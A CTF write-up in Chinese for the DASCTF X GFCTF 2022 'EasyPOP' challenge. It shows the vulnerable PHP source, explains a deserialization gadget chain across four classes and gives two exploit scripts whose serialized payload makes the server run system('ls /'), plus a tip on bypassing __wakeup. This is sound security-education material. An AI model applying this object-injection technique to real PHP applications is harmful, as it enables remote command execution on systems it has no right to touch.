DASCTF X GFCTF 2022十月挑战赛
EasyPOP
<?php
highlight_file(__FILE__);
error_reporting(0);
class fine
{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
public function __invoke()
{
call_user_func($this->cmd, $this->content);
}
public function __wakeup()
{
$this->cmd = "";
die("Go listen to Jay Chou's secret-code! Really nice");
}
}
class show
{
public $ctf;
public $time = "Two and a half years";
public function __construct($ctf)
{
$this->ctf = $ctf;
}
public function __toString()
{
return $this->ctf->show();
}
public function show(): string
{
return $this->ctf . ": Duration of practice: " . $this->time;
}
}
class sorry
{
private $name;
private $password;
public $hint = "hint is depend on you";
public $key;
public function __construct($name, $password)
{
$this->name = $name;
$this->password = $password;
}
public function __sleep()
{
$this->hint = new secret_code();
}
public function __get($name)
{
$name = $this->key;
$name();
}
public function __destruct()
{
if ($this->password == $this->name) {
echo $this->hint;
} else if ($this->name = "jay") {
secret_code::secret();
} else {
echo "This is our code";
}
}
public function getPassword()
{
return $this->password;
}
public function setPassword($password): void
{
$this->password = $password;
}
}
class secret_code
{
protected $code;
public static function secret()
{
include_once "hint.php";
hint();
}
public function __call($name, $arguments)
{
$num = $name;
$this->$num();
}
private function show()
{
return $this->code->secret;
}
}
if (isset($_GET['pop'])) {
$a = unserialize($_GET['pop']);
$a->setPassword(md5(mt_rand()));
} else {
$a = new show("Ctfer");
echo $a->show();
}
pop链的构造
切入口 sorry类的析构函数,突破口fine类的__invoke函数中的call_user_func函数
sorry的析构函数有echo $this->hint 联想一下__toString函数
show类有this->ctf->show() 联想一下__call函数或者看看其他类有show函数没
secret_code类的show函数有this->code->secret,secret属性是所有类都没有的,自然联想到__get,sorry类的__get函数有$name(),联想到__invoke,fine类的__invoke函数有call_user_func函数,也就是突破口
sorry.__destruct->show.__toString->secret.show()->sorry.__get->$fine.__invoke->call_user_func函数
EXP:
<?php
class fine
{
public $cmd;
public $content;
}
class show
{
public $ctf;
public $time = "Two and a half years";
}
class sorry
{
public $name;
public $password;
public $hint = "hint is depend on you";
public $key;
}
class secret_code
{
public $code;
}
$Fine = new fine();
$Show = new show();
$Sorry = new sorry();
$Sorry2 = new sorry();
$Secret = new secret_code();
$Sorry->name = 'cc';
$Sorry->password = 'cc';
$Sorry->hint = $Show;
$Show->ctf = $Secret;
$Secret->code = $Sorry2;
$Sorry2->name = 'cc';
$Sorry2->password = 'cc';
$Sorry2->key = $Fine;
$Fine->cmd = 'system';
$Fine->content = 'ls /';
$a = serialize($Sorry);
echo $a
?>
注意:fine类中有__wakeup函数需要绕过。
补充:另一种写法,一定要url编码,因为里边有不可见字符。这种适用于php7以下版本。上边这种写法是php7特性。
<?php
class fine
{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
}
class show
{
public $ctf;
public $time = "Two and a half years";
public function __construct($ctf, $time)
{
$this->ctf = $ctf;
$this->time = $time;
}
}
class sorry
{
private $name;
private $password;
public $hint = "hint is depend on you";
public $key;
public function __construct($name, $password,$hint,$key)
{
$this->name = $name;
$this->password = $password;
$this->hint = $hint;
$this->key = $key;
}
}
class secret_code
{
protected $code;
public function __construct($code)
{
$this->code = $code;
}
}
$Sorry= new sorry('cc','cc',new show(new secret_code(new sorry('cc','cc','cc',new fine('system','ls'))),'cc'),'cc');
$c = serialize($Sorry);
echo urlencode($c);
?>